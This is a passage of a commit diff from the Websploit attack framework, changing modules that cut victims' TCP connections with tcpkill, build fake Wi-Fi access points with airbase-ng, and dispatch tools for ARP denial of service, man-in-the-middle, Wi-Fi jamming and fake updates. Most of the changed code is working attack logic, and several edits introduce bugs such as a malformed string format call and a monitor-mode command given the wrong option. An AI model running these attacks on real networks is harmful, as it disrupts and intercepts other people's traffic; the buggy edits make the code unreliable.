                        sleep(2)
                        print (wcolors.color.BLUE + "[*]Sniffer Starting ..." + wcolors.color.ENDC)
                        os.system(selected_sniffer)
index 1616a81..98ebdd0 100644 (file)
@@ -5,6 +5,7 @@
 # Email : 0x0ptim0us@Gmail.Com\r
 \r
 import os\r
+import subprocess\r
 from time import sleep\r
 from core import wcolors\r
 from core import help\r
@@ -43,9 +44,10 @@ def webkiller():
             pass\r
         elif com[0:3] =='run':\r
             print (wcolors.color.BLUE + "[*]IP Forwarding ..." + wcolors.color.ENDC)\r
-            os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')\r
+            subprocess.Popen('echo 1 > /proc/sys/net/ipv4/ip_forward', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r
             sleep(2)\r
-            os.system('xterm -e tcpkill -i ' + options[0] +' -9 host ' + options[1] + ' &')\r
+            command_1 = 'tcpkill -i ' + options[0] +' -9 host ' + options[1]\r
+            subprocess.Popen(command_1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r
             line_3 = wcolors.color.GREEN + "[*]Attack Has Been Started, For Stop Attack Press [enter] Key..." + wcolors.color.ENDC\r
             press_ak = raw_input(line_3)\r
             os.system('killall tcpkill')\r
index 6100fad..745c67b 100644 (file)
@@ -28,7 +28,7 @@ def wifi_honeypot():
             print "ESSID => ", options[1]
             wifi_honeypot()
         elif com[0:11] == 'set channel':
-            options[2] = com[12:13]
+            options[2] = com[12:14]
             print "CHANNEL => ", options[2]
             wifi_honeypot()
         elif com[0:7] == 'set mac':
@@ -64,7 +64,7 @@ def wifi_honeypot():
             print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel"
             print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address"
             print "output\t\t"+options[4]+"\t\tyes\tLog File Location"
-            print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mode(default)"
+            print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mod(default)"
             print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions"
             print "\n"
             print "Numbers\t\t Encryptions"
@@ -76,34 +76,35 @@ def wifi_honeypot():
             print ""
             wifi_honeypot()
         elif com[0:3] == 'run':
-            comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
-            comm2= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
-            comm3= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -z 2 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
-            comm4= "xterm -e airbase-ng -a %s -c %s --essid %s -W 1 -Z 4 %s > %s &" %(options[3], options[2], options[1], options[5], options[4])
-            monit_mod_start= "airmon-ng start %s" %(options[0])
-            print(wcolors.color.GREEN+"[*]Enable monitor mode on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
+            comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4])
+            comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
+            comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
+            comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4])
+            monit_mod_start= "airmon-ng start %s" % str(options[1])
+            print(wcolors.color.GREEN+"[*]Enable monitor mod on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]),
             subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
             print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
             print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC),
-            if options[6]=='1':
+            if options[6]==1:
                 os.system(comm1)
-            elif options[6]=='2':
+            elif options[6]==2:
                 os.system(comm2)
-            elif options[6]=='3':
+            elif options[6]==3:
                 os.system(comm3)
-            elif options[6]=='4':
+            elif options[6]==4:
                 os.system(comm4)
+            else:
+                print(wcolors.color.RED+"[!]Error : Encryption ID not Found!"+wcolors.color.ENDC)
+                pass
             sleep(2)
             print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC)
             wifi_honeypot()
         elif com[0:4]=='stop':
-            monit_mod_stop="xterm -e airmon-ng stop %s"%(options[5])
             os.system("killall xterm")
             os.system("killall airbase-ng")
-            os.system(monit_mod_stop)
             wifi_honeypot()
         else:
             print "Wrong Command => ", com
             wifi_honeypot()
     except(KeyboardInterrupt):
-        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
+        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC)
\ No newline at end of file
index b075ed3..537b50d 100755 (executable)
--- a/websploit
+++ b/websploit
@@ -32,6 +32,7 @@
 #    Blog : www.websploit.ir
 #
 import os
+import readline, rlcompleter
 from time import sleep
 from core import wcolors
 from core import menu
@@ -45,6 +46,7 @@ from modules import apache_users
 from modules import wmap
 from modules import directory_scanner
 from modules import phpmyadmin
+from modules import cloudflare_resolver
 from modules import arp_dos
 from modules import autopwn
 from modules import mitm
@@ -58,7 +60,6 @@ from modules import wifi_jammer
 from modules import wifi_dos
 from modules import wifi_honeypot
 from modules import bluetooth_pod
-from modules.fakeap import fake_ap
 from modules.fakeupdate import fakeupdate
 
 def main():
@@ -70,6 +71,9 @@ def main():
             if terminal[4:20] =='web/apache_users':
                 apache_users.apache_users()
                 main()
+            if terminal[4:27] =='web/cloudflare_resolver':
+                cloudflare_resolver.cloudflare_resolver()
+                main()
             elif terminal[4:20] =='network/arp_dos':
                 arp_dos.arp_dos()
                 main()
@@ -103,9 +107,6 @@ def main():
             elif terminal[4:21] =='network/webkiller':
                 webkiller.webkiller()
                 main()
-            elif terminal[4:18] =='network/fakeap':
-                fake_ap.fake_sts()
-                main()
             elif terminal[4:24] =='network/arp_poisoner':
                 arp_poisoner.arp_poisoner()
                 main()
@@ -147,8 +148,8 @@ def main():
             print "Wrong Command => ", terminal
             main()
     except(KeyboardInterrupt):
-        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Tring To Exit ..." + wcolors.color.ENDC)
-        print(wcolors.color.YELLOW + "[*] Thank You For Using From Websploit Framework =)" + wcolors.color.ENDC)
+        print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Trying To Exit ..." + wcolors.color.ENDC)
+        print(wcolors.color.YELLOW + "[*] Thank You For Using Websploit Framework =)" + wcolors.color.ENDC)
 def start():
     header.main_header()
     menu.main_info()